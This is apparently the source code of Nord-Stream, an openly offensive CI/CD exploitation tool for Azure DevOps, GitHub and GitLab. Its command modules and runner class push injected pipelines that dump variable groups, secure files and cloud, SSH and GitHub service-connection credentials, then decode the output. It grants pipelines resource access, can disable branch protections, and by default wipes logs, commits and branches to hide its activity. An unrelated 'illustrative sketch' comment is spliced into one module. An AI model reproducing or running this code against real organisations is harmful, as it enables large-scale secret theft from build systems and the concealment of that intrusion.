DevOpsRunner(devops) if args["--key-id"]: Git.KEY_ID = args["--key-id"] if args["--user"]: Git.USER = args["--user"] if args["--email"]: Git.EMAIL = args["--email"] if args["--pipeline-file"]: devopsRunner.pipelineFilename = args["--pipeline-file"] if args["--yaml"]: devopsRunner.yaml = args["--yaml"] if args["--write-filter"]: devopsRunner.writeAccessFilter = args["--write-filter"] if 
args["--pool-name"]: devopsRunner.poolName = args["--pool-name"] if args["--os"]: devopsRunner.os = args["--os"].lower() if args["--extract"] and args["--no-extract"]: logger.critical("Can't use both --service-connection and --no-service-connection option.") if args["--extract"]: devopsRunner.parseExtractList(args["--extract"]) if args["--no-extract"]: devopsRunner.parseExtractList(args["--no-extract"], False) if args["--no-clean"]: devopsRunner.cleanLogs = not args["--no-clean"] if args["--describe-token"]: devopsRunner.describeToken() return devopsRunner.getProjects(args["--project"]) # logic if args["--list-projects"]: devopsRunner.listDevOpsProjects() elif args["--list-repositories"]: devopsRunner.listDevOpsRepositories() elif args["--list-users"]: devopsRunner.listDevOpsUsers() elif args["--list-secrets"]: devopsRunner.listProjectSecrets() elif args["--clean-logs"]: devopsRunner.manualCleanLogs() elif args["--build-yaml"]: devopsRunner.output = args["--build-yaml"] devopsRunner.createYaml(args["--build-type"]) else: devopsRunner.runPipeline() ================================================ FILE: nordstream/commands/github.py ================================================ """ CICD pipeline exploitation tool Usage: nord-stream github [options] --token --org [--repo --no-repo --no-env --no-org --env --disable-protections --branch-name --no-clean] nord-stream github [options] --token --org --yaml --repo [--env --disable-protections --branch-name --no-clean] nord-stream github [options] --token --org ([--clean-logs] [--clean-branch-policy]) [--repo --branch-name ] nord-stream github [options] --token --org --build-yaml --repo [--build-type --env ] nord-stream github [options] --token --org --azure-tenant-id --azure-client-id [--repo --env --disable-protections --branch-name --no-clean] nord-stream github [options] --token --org --aws-role --aws-region [--repo --env --disable-protections --branch-name --no-clean] nord-stream github [options] --token --org --list-protections [--repo --branch-name --disable-protections] nord-stream github [options] --token --org --list-secrets [--repo --no-repo --no-env --no-org] nord-stream github [options] --token [--org ] --list-repos [--write-filter] nord-stream github [options] --token --describe-token Options: -h --help Show this screen. --version Show version. -v, --verbose Verbose mode -d, --debug Debug mode --output-dir Output directory for logs Commit: --user User used to commit --email Email address used commit --key-id GPG primary key ID to sign commits args: --token Github personal token --org Org name -r, --repo Run on selected repo (can be a file) -y, --yaml Run arbitrary job --clean-logs Delete all logs created by this tool. This operation is done by default but can be manually triggered. --no-clean Don't clean workflow logs (default false) --clean-branch-policy Remove branch policy, can be used with --repo. This operation is done by default but can be manually triggered. --build-yaml Create a pipeline yaml file with all secrets. --build-type Type used to generate the yaml file can be: default, azureoidc, awsoidc --env Specify env for the yaml file creation. --no-repo Don't extract repo secrets. --no-env Don't extract environnments secrets. --no-org Don't extract organization secrets. --azure-tenant-id Identifier of the Azure tenant associated with the application having federated credentials (OIDC related). 
--azure-subscription-id Identifier of the Azure subscription associated with the application having federated credentials (OIDC related). --azure-client-id Identifier of the Azure application (client) associated with the application having federated credentials (OIDC related). --aws-role AWS role to assume (OIDC related). --aws-region AWS region (OIDC related). --list-protections List all protections. --list-repos List all repos. --list-secrets List all secrets. --disable-protections Disable the branch protection rules (needs admin rights) --write-filter Filter repo where current user has write or admin access. --force Don't check environment and branch protections. --branch-name Use specific branch name for deployment. --describe-token Display information on the token Examples: List all secrets from all repositories $ nord-stream github --token "$GHP" --org myorg --list-secrets Dump all secrets from all repositories and try to disable branch protections $ nord-stream github --token "$GHP" --org myorg --disable-protections Authors: @hugow @0hexit """ from docopt import docopt from nordstream.cicd.github import GitHub from nordstream.core.github.github import GitHubWorkflowRunner from nordstream.utils.log import logger, NordStreamLog from nordstream.git import Git def start(argv): args = docopt(__doc__, argv=argv) if args["--verbose"]: NordStreamLog.setVerbosity(verbose=1) if args["--debug"]: NordStreamLog.setVerbosity(verbose=2) logger.debug(args) # check validity of the token if not GitHub.checkToken(args["--token"]): logger.critical("Invalid token.") # github setup gitHub = GitHub(args["--token"]) if args["--output-dir"]: gitHub.outputDir = args["--output-dir"] + "/" if args["--org"]: gitHub.org = args["--org"] if args["--branch-name"]: gitHub.branchName = args["--branch-name"] logger.info(f'Using branch: "{gitHub.branchName}"') if args["--key-id"]: Git.KEY_ID = args["--key-id"] if args["--user"]: Git.USER = args["--user"] if args["--email"]: Git.EMAIL = args["--email"] # runner setup gitHubWorkflowRunner = GitHubWorkflowRunner(gitHub, args["--env"]) if args["--no-repo"]: gitHubWorkflowRunner.extractRepo = not args["--no-repo"] if args["--no-env"]: gitHubWorkflowRunner.extractEnv = not args["--no-env"] if args["--no-org"]: gitHubWorkflowRunner.extractOrg = not args["--no-org"] if args["--yaml"]: gitHubWorkflowRunner.yaml = args["--yaml"] if args["--disable-protections"]: gitHubWorkflowRunner.disableProtections = args["--disable-protections"] if args["--write-filter"]: gitHubWorkflowRunner.writeAccessFilter = args["--write-filter"] if args["--force"]: gitHubWorkflowRunner.forceDeploy = args["--force"] if args["--aws-role"] or args["--azure-tenant-id"]: gitHubWorkflowRunner.exploitOIDC = True if args["--azure-tenant-id"]: gitHubWorkflowRunner.tenantId = args["--azure-tenant-id"] if args["--azure-subscription-id"]: gitHubWorkflowRunner.subscriptionId = args["--azure-subscription-id"] if args["--azure-client-id"]: gitHubWorkflowRunner.clientId = args["--azure-client-id"] if args["--aws-role"]: gitHubWorkflowRunner.role = args["--aws-role"] if args["--aws-region"]: gitHubWorkflowRunner.region = args["--aws-region"] if args["--no-clean"]: gitHubWorkflowRunner.cleanLogs = not args["--no-clean"] # logic if args["--describe-token"]: gitHubWorkflowRunner.describeToken() elif args["--list-repos"]: gitHubWorkflowRunner.getRepos(args["--repo"]) gitHubWorkflowRunner.listGitHubRepos() elif args["--list-secrets"]: gitHubWorkflowRunner.getRepos(args["--repo"]) gitHubWorkflowRunner.listGitHubSecrets() 
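# NOTE (illustrative sketch, not part of the original tool): under the hood,
# listGitHubSecrets() boils down to calls against GitHub's REST secret
# endpoints, which only ever return secret *names* -- the values themselves
# can only be recovered by exfiltrating them through a workflow run. A minimal
# standalone equivalent of the repo-level call, assuming a PAT with access to
# the repository (the endpoint and response shape are the documented GitHub
# API; the function name is hypothetical):
import requests

def list_repo_secret_names(token, repo):
    # GET /repos/{owner}/{repo}/actions/secrets returns
    # {"total_count": N, "secrets": [{"name": ...}, ...]}
    r = requests.get(
        f"https://api.github.com/repos/{repo}/actions/secrets",
        headers={"Authorization": f"token {token}", "Accept": "application/vnd.github+json"},
    )
    r.raise_for_status()
    return [s["name"] for s in r.json().get("secrets", [])]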
elif args["--build-yaml"]: gitHubWorkflowRunner.writeAccessFilter = True gitHubWorkflowRunner.workflowFilename = args["--build-yaml"] gitHubWorkflowRunner.createYaml(args["--repo"], args["--build-type"]) # Cleaning elif args["--clean-logs"] or args["--clean-branch-policy"]: gitHubWorkflowRunner.getRepos(args["--repo"]) if args["--clean-logs"]: gitHubWorkflowRunner.manualCleanLogs() if args["--clean-branch-policy"]: gitHubWorkflowRunner.manualCleanBranchPolicy() elif args["--list-protections"]: gitHubWorkflowRunner.writeAccessFilter = True gitHubWorkflowRunner.getRepos(args["--repo"]) gitHubWorkflowRunner.checkBranchProtections() else: gitHubWorkflowRunner.writeAccessFilter = True gitHubWorkflowRunner.getRepos(args["--repo"]) gitHubWorkflowRunner.start() ================================================ FILE: nordstream/commands/gitlab.py ================================================ """ CICD pipeline exploitation tool Usage: nord-stream gitlab [options] --token (--list-secrets | --list-protections) [--project --group --no-project --no-group --no-instance --write-filter --sleep ] nord-stream gitlab [options] --token ( --list-groups | --list-projects | --list-users | --list-runners) [--project --group --write-filter] nord-stream gitlab [options] --token --yaml --project [--project-path --no-clean] nord-stream gitlab [options] --token --clean-logs [--project ] nord-stream gitlab [options] --token --describe-token Options: -h --help Show this screen. --version Show version. -v, --verbose Verbose mode -d, --debug Debug mode --output-dir Output directory for logs --url Gitlab URL [default: https://gitlab.com] --ignore-cert Allow insecure server connections --membership Limit by projects that the current user is a member of Commit: --user User used to commit --email Email address used commit --key-id GPG primary key ID to sign commits args: --token GitLab personal access token or _gitlab_session cookie --project Run on selected project (can be a file / project id) --group Run on selected group (can be a file) --list-secrets List all secrets. --list-protections List branch protection rules. --list-projects List all projects. --list-groups List all groups. --list-users List all users. --list-runners List runners through project jobs (unprivileged, but non-exhaustive). --write-filter Filter repo where current user has developer access or more. --no-project Don't extract project secrets. --no-group Don't extract group secrets. --no-instance Don't extract instance secrets. -y, --yaml Run arbitrary job --branch-name Use specific branch name for deployment. --clean-logs Delete all pipeline logs created by this tool. This operation is done by default but can be manually triggered. --no-clean Don't clean pipeline logs (default false) --describe-token Display information on the token --sleep Time to sleep in seconds between each secret request. --project-path Local path of the git folder. 
Examples: Dump all secrets $ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --list-secrets Deploy the custom pipeline on the master branch $ nord-stream gitlab --token "$TOKEN" --url https://gitlab.local --yaml exploit.yaml --branch-name master --project 'group/projectname' Authors: @hugow @0hexit """ from docopt import docopt from nordstream.cicd.gitlab import GitLab from nordstream.core.gitlab.gitlab import GitLabRunner from nordstream.utils.log import logger, NordStreamLog from nordstream.git import Git def start(argv): args = docopt(__doc__, argv=argv) if args["--verbose"]: NordStreamLog.setVerbosity(verbose=1) if args["--debug"]: NordStreamLog.setVerbosity(verbose=2) logger.debug(args) # check validity of the token if not GitLab.checkToken(args["--token"], args["--url"], (not args["--ignore-cert"])): logger.critical('Invalid token or the token doesn\'t have the "api" scope.') # gitlab setup gitlab = GitLab(args["--url"], args["--token"], (not args["--ignore-cert"])) if args["--output-dir"]: gitlab.outputDir = args["--output-dir"] + "/" gitLabRunner = GitLabRunner(gitlab) if args["--key-id"]: Git.KEY_ID = args["--key-id"] if args["--user"]: Git.USER = args["--user"] if args["--email"]: Git.EMAIL = args["--email"] if args["--branch-name"]: gitlab.branchName = args["--branch-name"] logger.info(f'Using branch: "{gitlab.branchName}"') # config if args["--write-filter"]: gitLabRunner.writeAccessFilter = args["--write-filter"] if args["--no-project"]: gitLabRunner.extractProject = not args["--no-project"] if args["--no-group"]: gitLabRunner.extractGroup = not args["--no-group"] if args["--no-instance"]: gitLabRunner.extractInstance = not args["--no-instance"] if args["--no-clean"]: gitLabRunner.cleanLogs = not args["--no-clean"] if args["--yaml"]: gitLabRunner.yaml = args["--yaml"] if args["--sleep"]: gitLabRunner.sleepTime = args["--sleep"] if args["--project-path"]: gitLabRunner.localPath = args["--project-path"] # logic if args["--describe-token"]: gitLabRunner.describeToken() elif args["--list-projects"]: gitLabRunner.getProjects(args["--project"], membership=args["--membership"]) gitLabRunner.listGitLabProjects() elif args["--list-protections"]: gitLabRunner.getProjects(args["--project"], membership=args["--membership"]) gitLabRunner.listBranchesProtectionRules() elif args["--list-groups"]: gitLabRunner.getGroups(args["--group"]) gitLabRunner.listGitLabGroups() elif args["--list-users"]: gitLabRunner.listGitLabUsers() elif args["--list-runners"]: if gitLabRunner.extractProject: gitLabRunner.getProjects(args["--project"], membership=args["--membership"]) if gitLabRunner.extractGroup: gitLabRunner.getGroups(args["--group"]) gitLabRunner.listGitLabRunners() elif args["--list-secrets"]: if gitLabRunner.extractProject: gitLabRunner.getProjects(args["--project"], membership=args["--membership"]) if gitLabRunner.extractGroup: gitLabRunner.getGroups(args["--group"]) gitLabRunner.listGitLabSecrets() elif args["--clean-logs"]: gitLabRunner.getProjects(args["--project"], membership=args["--membership"]) gitLabRunner.manualCleanLogs() else: gitLabRunner.getProjects(args["--project"], strict=True, membership=args["--membership"]) gitLabRunner.runPipeline()
DevOpsError, GitError, RepoCreationError from nordstream.utils.helpers import isAllowed from nordstream.utils.log import logger from nordstream.yaml.devops import DevOpsPipelineGenerator class DevOpsRunner: _cicd = None _extractVariableGroups = True _extractSecureFiles = True _extractAzureServiceconnections = True _extractGitHubServiceconnections = True _extractAWSServiceconnections = True _extractSonarServiceconnections = True _extractSSHServiceConnections = True _yaml = None _writeAccessFilter = False _poolName = None _os = "linux" _pipelineFilename = "azure-pipelines.yml" _output = None _cleanLogs = True _resType = {"default": 0, "doubleb64": 1, "github": 2, "azurerm": 3} _pushedCommitsCount = 0 _branchAlreadyExists = False _allowedTypes = ["azurerm", "github", "aws", "sonarqube", "ssh"] def __init__(self, cicd): self._cicd = cicd self.__createLogDir() @property def extractVariableGroups(self): return self._extractVariableGroups @extractVariableGroups.setter def extractVariableGroups(self, value): self._extractVariableGroups = value @property def extractSecureFiles(self): return self._extractSecureFiles @extractSecureFiles.setter def extractSecureFiles(self, value): self._extractSecureFiles = value @property def extractAzureServiceconnections(self): return self._extractAzureServiceconnections @extractAzureServiceconnections.setter def extractAzureServiceconnections(self, value): self._extractAzureServiceconnections = value @property def extractGitHubServiceconnections(self): return self._extractGitHubServiceconnections @extractGitHubServiceconnections.setter def extractGitHubServiceconnections(self, value): self._extractGitHubServiceconnections = value @property def extractAWSServiceconnections(self): return self._extractAWSServiceconnections @extractAWSServiceconnections.setter def extractAWSServiceconnections(self, value): self._extractAWSServiceconnections = value @property def extractSonarServiceconnections(self): return self._extractSonarServiceconnections @extractSonarServiceconnections.setter def extractSonarServiceconnections(self, value): self._extractSonarServiceconnections = value @property def extractSSHServiceConnections(self): return self._extractSSHServiceConnections @extractSSHServiceConnections.setter def extractSSHServiceConnections(self, value): self._extractSSHServiceConnections = value @property def output(self): return self._output @output.setter def output(self, value): self._output = value @property def cleanLogs(self): return self._cleanLogs @cleanLogs.setter def cleanLogs(self, value): self._cleanLogs = value @property def yaml(self): return self._yaml @yaml.setter def yaml(self, value): self._yaml = realpath(value) @property def pipelineFilename(self): return self._pipelineFilename @pipelineFilename.setter def pipelineFilename(self, value): self._pipelineFilename = value @property def writeAccessFilter(self): return self._writeAccessFilter @writeAccessFilter.setter def writeAccessFilter(self, value): self._writeAccessFilter = value @property def poolName(self): return self._poolName @poolName.setter def poolName(self, value): self._poolName = value @property def os(self): return self._os @os.setter def os(self, value): self._os = value def __createLogDir(self): self._cicd.outputDir = realpath(self._cicd.outputDir) + "/azure_devops" makedirs(self._cicd.outputDir, exist_ok=True) def listDevOpsProjects(self): logger.info("Listing all projects:") for p in self._cicd.projects: name = p.get("name") logger.raw(f"- {name}\n", level=logging.INFO) def
listDevOpsRepositories(self): logger.info("Listing all repositories:") for p in self._cicd.projects: project_name = p.get("name") for r in self._cicd.listRepositories(project_name): name = r.get("name") logger.raw(f"- {project_name}/{name}\n", level=logging.INFO) def listDevOpsUsers(self): logger.info("Listing all users:") for p in self._cicd.listUsers(): origin = p.get("origin") displayName = p.get("displayName") mailAddress = p.get("mailAddress") res = f"- {displayName}" if mailAddress != "": res += f" / {mailAddress}" res += f" ({origin})\n" logger.raw(res, level=logging.INFO) def getProjects(self, project): if project: if exists(project): with open(project, "r") as file: for project in file: self._cicd.addProject(project.strip()) else: self._cicd.addProject(project) else: self._cicd.listProjects() if self._writeAccessFilter: self._cicd.filterWriteProjects() if len(self._cicd.projects) == 0: if self._writeAccessFilter: logger.critical("No project with write access found.") else: logger.critical("No project found.") def listProjectSecrets(self): logger.info("Listing secrets") for project in self._cicd.projects: projectName = project.get("name") projectId = project.get("id") logger.info(f'"{projectName}" secrets') self.__displayProjectVariableGroupsSecrets(projectId) self.__displayProjectSecureFiles(projectId) self.__displayServiceConnections(projectId) logger.empty_line() def __displayProjectVariableGroupsSecrets(self, project): try: secrets = self._cicd.listProjectVariableGroupsSecrets(project) except DevOpsError as e: logger.error(e) else: if len(secrets) != 0: for variableGroup in secrets: logger.info(f"Variable group: \"{variableGroup.get('name')}\"") for sec in variableGroup.get("variables"): logger.raw(f"\t- {sec}\n", logging.INFO) def __displayProjectSecureFiles(self, project): try: secureFiles = self._cicd.listProjectSecureFiles(project) except DevOpsError as e: logger.error(e) else: if secureFiles: for sf in secureFiles: logger.info(f'Secure file: "{sf["name"]}"') def __displayServiceConnections(self, projectId): try: serviceConnections = self._cicd.listServiceConnections(projectId) except DevOpsError as e: logger.error(e) else: if len(serviceConnections) != 0: logger.info("Service connections:") for sc in serviceConnections: scType = sc.get("type") scName = sc.get("name") logger.raw(f"\t- {scName} ({scType})\n", logging.INFO) def __checkSecrets(self, project): projectId = project.get("id") projectName = project.get("name") secrets = 0 if ( self._extractAzureServiceconnections or self._extractGitHubServiceconnections or self._extractAWSServiceconnections or self._extractSonarServiceconnections or self._extractSSHServiceConnections ): try: secrets += len(self._cicd.listServiceConnections(projectId)) except DevOpsError as e: logger.error(f"Error while listing service connection: {e}") if self._extractVariableGroups: try: secrets += len(self._cicd.listProjectVariableGroupsSecrets(projectId)) except DevOpsError as e: logger.error(f"Error while listing variable groups: {e}") if self._extractSecureFiles: try: secrets += len(self._cicd.listProjectSecureFiles(projectId)) except DevOpsError as e: logger.error(f"Error while listing secure files: {e}") if secrets == 0: logger.info(f'No secrets found for project "{projectName}" / "{projectId}"') return False return True def createYaml(self, pipelineType): pipelineGenerator = DevOpsPipelineGenerator() if pipelineType == "github": pipelineGenerator.generatePipelineForGitHub("#FIXME", self._poolName, self._os) elif pipelineType == "azurerm": 
pipelineGenerator.generatePipelineForAzureRm("#FIXME", self._poolName, self._os) elif pipelineType == "aws": pipelineGenerator.generatePipelineForAWS("#FIXME", self._poolName, self._os) elif pipelineType == "sonar": pipelineGenerator.generatePipelineForSonar("#FIXME", self._poolName, self._os) elif pipelineType == "ssh": pipelineGenerator.generatePipelineForSSH("#FIXME", self._poolName, self._os) else: pipelineGenerator.generatePipelineForSecretExtraction({"name": "", "variables": ""}, self._poolName, self._os) logger.success("YAML file: ") pipelineGenerator.displayYaml() pipelineGenerator.writeFile(self._output) def __extractPipelineOutput(self, projectId, resType=0, resultsFilename="secrets.txt"): with open( f"{self._cicd.outputDir}/{self._cicd.org}/{projectId}/{self._fileName}", "rb", ) as output: try: if resType == self._resType["doubleb64"]: pipelineResults = self.__doubleb64(output) elif resType == self._resType["github"]: pipelineResults = self.__extractGitHubResults(output) elif resType == self._resType["azurerm"]: pipelineResults = self.__azureRm(output) elif resType == self._resType["default"]: pipelineResults = output.read() else: logger.exception("Invalid result type, check _resType") except: output.seek(0) pipelineResults = output.read() logger.success("Output:") logger.raw(pipelineResults, logging.INFO) with open(f"{self._cicd.outputDir}/{self._cicd.org}/{projectId}/{resultsFilename}", "ab") as file: file.write(pipelineResults) @staticmethod def __extractGitHubResults(output): decoded = DevOpsRunner.__doubleb64(output) for line in decoded.split(b"\n"): if b"AUTHORIZATION" in line: try: return base64.b64decode(line.split(b" ")[-1]) + b"\n" except Exception as e: logger.error(e) return None @staticmethod def __doubleb64(output): # the injected pipeline prints the secrets double-base64-encoded; grab them from the third-to-last line of the log data = output.readlines()[-3].split(b" ")[1] return base64.b64decode(base64.b64decode(data)) @staticmethod def __azureRm(output): # same double-base64 layout as __doubleb64, kept as a separate helper for readability data = output.readlines()[-3].split(b" ")[1] return base64.b64decode(base64.b64decode(data)) def __launchPipeline(self, project, pipelineId, pipelineGenerator): logger.verbose(f"Launching pipeline.") pipelineGenerator.writeFile(f"./{self._pipelineFilename}") pushOutput = Git.gitPush(self._cicd.branchName) pushOutput.wait() try: if b"Everything up-to-date" in pushOutput.communicate()[1].strip(): logger.error("Error when pushing code: Everything up-to-date") logger.warning( "You're trying to push the same code on an existing branch; modify the YAML file to push it."
) elif pushOutput.returncode != 0: logger.error("Error when pushing code:") logger.raw(pushOutput.communicate()[1], logging.INFO) else: self._pushedCommitsCount += 1 logger.raw(pushOutput.communicate()[1]) # manual trigger because otherwise is difficult to get the right runId run = self._cicd.runPipeline(project, pipelineId) self.__checkRunErrors(run) runId = run.get("id") pipelineStatus = self._cicd.waitPipeline(project, pipelineId, runId) if pipelineStatus == "succeeded": logger.success("Pipeline has successfully terminated.") return runId elif pipelineStatus == "failed": self.__displayFailureReasons(project, runId) return None except Exception as e: logger.error(e) finally: pass def __displayFailureReasons(self, projectId, runId): logger.error("Workflow failure:") for reason in self._cicd.getFailureReason(projectId, runId): logger.error(f"{reason}") def __extractVariableGroupsSecrets(self, projectId, pipelineId): logger.verbose(f"Getting variable groups secrets") try: variableGroups = self._cicd.listProjectVariableGroupsSecrets(projectId) except DevOpsError as e: logger.error(e) else: if len(variableGroups) > 0: for variableGroup in variableGroups: pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForSecretExtraction(variableGroup, self._poolName, self._os) logger.verbose( f'Checking (and modifying) pipeline permissions for variable group: "{variableGroup["name"]}"' ) if not self._cicd.authorizePipelineForResourceAccess( projectId, pipelineId, variableGroup, "variablegroup" ): continue variableGroupName = variableGroup.get("name") logger.info(f'Extracting secrets for variable group: "{variableGroupName}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId, self._resType["doubleb64"]) logger.empty_line() else: logger.info("No variable groups found") def __extractSecureFiles(self, projectId, pipelineId): logger.verbose(f"Getting secure files") try: secureFiles = self._cicd.listProjectSecureFiles(projectId) except DevOpsError as e: logger.error(e) else: if secureFiles: for secureFile in secureFiles: pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForSecureFileExtraction(secureFile["name"], self._poolName) logger.verbose( f'Checking (and modifying) pipeline permissions for the secure file: "{secureFile["name"]}"' ) if not self._cicd.authorizePipelineForResourceAccess( projectId, pipelineId, secureFile, "securefile" ): continue logger.info(f'Extracting secure file: "{secureFile["name"]}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: date = time.strftime("%Y-%m-%d_%H-%M-%S") safeSecureFilename = "".join( [c for c in secureFile["name"] if c.isalpha() or c.isdigit() or c in (" ", ".")] ).strip() self.__extractPipelineOutput( projectId, self._resType["doubleb64"], f"pipeline_{date}_secure_file_{safeSecureFilename}", ) logger.empty_line() else: logger.info("No secure files found") def __extractGitHubSecrets(self, projectId, pipelineId, sc): endpoint = sc.get("name") pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForGitHub(endpoint, self._poolName, self._os) logger.info(f'Extracting secrets for GitHub: "{endpoint}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = 
self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId, self._resType["github"]) logger.empty_line() def __extractAzureRMSecrets(self, projectId, pipelineId, sc): scheme = sc.get("authorization").get("scheme").lower() if scheme == "serviceprincipal": name = sc.get("name") pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForAzureRm(name, self._poolName, self._os) logger.info(f'Extracting secrets for AzureRM: "{name}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId, self._resType["azurerm"]) logger.empty_line() else: logger.error(f"Unsupported scheme: {scheme}") def __extractAWSSecrets(self, projectId, pipelineId, sc): scheme = sc.get("authorization").get("scheme").lower() if scheme == "usernamepassword": name = sc.get("name") pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForAWS(name, self._poolName, self._os) logger.info(f'Extracting secrets for AWS: "{name}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId, self._resType["doubleb64"]) logger.empty_line() else: logger.error(f"Unsupported scheme: {scheme}") def __extractSonarSecrets(self, projectId, pipelineId, sc): endpoint = sc.get("name") pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForSonar(endpoint, self._poolName, self._os) logger.info(f'Extracting secrets for Sonar: "{endpoint}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId, self._resType["doubleb64"]) logger.empty_line() def __extractSSHSecrets(self, projectId, pipelineId, sc): endpoint = sc.get("name") pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.generatePipelineForSSH(endpoint, self._poolName, self._os) logger.info(f'Extracting secrets for ssh: "{endpoint}"') runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId, self._resType["doubleb64"]) logger.empty_line() def __extractServiceConnectionsSecrets(self, projectId, pipelineId): try: serviceConnections = self._cicd.listServiceConnections(projectId) except DevOpsError as e: logger.error(e) else: for sc in serviceConnections: scType = sc.get("type").lower() if scType in self._allowedTypes: logger.verbose( f'Checking (and modifying) pipeline permissions for the service connection: "{sc["name"]}"' ) if not self._cicd.authorizePipelineForResourceAccess(projectId, pipelineId, sc, "endpoint"): continue if self._extractAzureServiceconnections and scType == "azurerm": self.__extractAzureRMSecrets(projectId, pipelineId, sc) elif self._extractGitHubServiceconnections and scType == "github": self.__extractGitHubSecrets(projectId, pipelineId, sc) elif self._extractAWSServiceconnections and scType == "aws": self.__extractAWSSecrets(projectId, pipelineId, sc) elif self._extractSonarServiceconnections and scType == "sonarqube": self.__extractSonarSecrets(projectId, pipelineId, sc) elif self._extractSSHServiceConnections and scType == "ssh": 
self.__extractSSHSecrets(projectId, pipelineId, sc) def manualCleanLogs(self): logger.info("Deleting logs") for project in self._cicd.projects: projectId = project.get("id") logger.info(f"Cleaning logs for project: {projectId}") self._cicd.cleanAllLogs(projectId) def __runSecretsExtractionPipeline(self, projectId, pipelineId): if self._extractVariableGroups: self.__extractVariableGroupsSecrets(projectId, pipelineId) if self._extractSecureFiles: self.__extractSecureFiles(projectId, pipelineId) if ( self._extractAzureServiceconnections or self._extractGitHubServiceconnections or self._extractAWSServiceconnections or self._extractSonarServiceconnections or self._extractSSHServiceConnections ): self.__extractServiceConnectionsSecrets(projectId, pipelineId) def __pushEmptyFile(self): Git.gitCreateDummyFile("README.md") diffOutput = Git.gitDiffFile("README.md") stdout, stderr = diffOutput.communicate() if stdout == b"": logger.verbose(f"README.md file not modified.") else: logger.verbose(f"README.md file is modified, incrementing commit count.") self._pushedCommitsCount += 1 pushOutput = Git.gitPush(self._cicd.branchName) pushOutput.wait() try: if pushOutput.returncode != 0: logger.error("Error when pushing code:") logger.raw(pushOutput.communicate()[1], logging.INFO) else: logger.raw(pushOutput.communicate()[1]) except Exception as e: logger.exception(e) def __createRemoteRepo(self, projectId): repo = self._cicd.createGit(projectId) if repo.get("id"): repoId = repo.get("id") logger.info(f'New remote repository created: "{self._cicd.repoName}" / "{repoId}"') return repo else: return None def __getRemoteRepo(self, projectId): for repo in self._cicd.listRepositories(projectId): if self._cicd.repoName == repo.get("name"): return repo, False repo = self.__createRemoteRepo(projectId) if repo != None: return repo, True raise RepoCreationError("No repo found") def __deleteRemoteBranch(self): logger.verbose("Deleting remote branch") deleteOutput = Git.gitDeleteRemote(self._cicd.branchName) deleteOutput.wait() if deleteOutput.returncode != 0: logger.error(f"Error deleting remote branch {self._cicd.branchName}") logger.raw(deleteOutput.communicate()[1], logging.INFO) return False return True def __clean(self, projectId, repoId, deleteRemoteRepo, deleteRemotePipeline): if self._cleanLogs: if deleteRemotePipeline: logger.verbose("Deleting remote pipeline.") self._cicd.deletePipeline(projectId) if deleteRemoteRepo: logger.verbose("Deleting remote repository.") self._cicd.deleteGit(projectId, repoId) else: if self._pushedCommitsCount > 0: if self._cleanLogs: logger.info(f"Cleaning logs for project: {projectId}") self._cicd.cleanAllLogs(projectId) logger.verbose("Cleaning commits.") if self._branchAlreadyExists and self._cicd.branchName != self._cicd.defaultBranchName: Git.gitUndoLastPushedCommits(self._cicd.branchName, self._pushedCommitsCount) else: if not self.__deleteRemoteBranch(): logger.info("Cleaning remote branch.") # rm everything if we can't delete the branch (only leave one file otherwise it will try to rm the branch) Git.gitCleanRemote(self._cicd.branchName, leaveOneFile=True) def __createPipeline(self, projectId, repoId): logger.info("Getting pipeline") self.__pushEmptyFile() for pipeline in self._cicd.listPipelines(projectId): if pipeline.get("name") == self._cicd.pipelineName: return pipeline.get("id"), False pipelineId = self._cicd.createPipeline(projectId, repoId, f"{self._pipelineFilename}") if pipelineId: return pipelineId, True else: raise Exception("unable to create a pipeline") def 
__runCustomPipeline(self, projectId, pipelineId): pipelineGenerator = DevOpsPipelineGenerator() pipelineGenerator.loadFile(self._yaml) logger.info("Running arbitrary pipeline") runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator) if runId: self._fileName = self._cicd.downloadPipelineOutput(projectId, runId) if self._fileName: self.__extractPipelineOutput(projectId) logger.empty_line() def runPipeline(self): for project in self._cicd.projects: projectId = project.get("id") repoId = None deleteRemoteRepo = False deleteRemotePipeline = False # skip if no secrets if not self._yaml: if not self.__checkSecrets(project): continue try: # Create or get first repo of the project repo, deleteRemoteRepo = self.__getRemoteRepo(projectId) repoId = repo.get("id") self._cicd.repoName = repo.get("name") logger.info(f'Getting remote repository: "{self._cicd.repoName}" /' f' "{repoId}"') url = f"https://foo:{self._cicd.token}@dev.azure.com/{self._cicd.org}/{projectId}/_git/{self._cicd.repoName}" if not Git.gitClone(url): raise GitError("Failed to clone the repository") chdir(self._cicd.repoName) self._branchAlreadyExists = Git.gitRemoteBranchExists(self._cicd.branchName) Git.gitInitialization(self._cicd.branchName, branchAlreadyExists=self._branchAlreadyExists) pipelineId, deleteRemotePipeline = self.__createPipeline(projectId, repoId) if self._yaml: self.__runCustomPipeline(projectId, pipelineId) else: self.__runSecretsExtractionPipeline(projectId, pipelineId) except (GitError, RepoCreationError) as e: name = project.get("name") 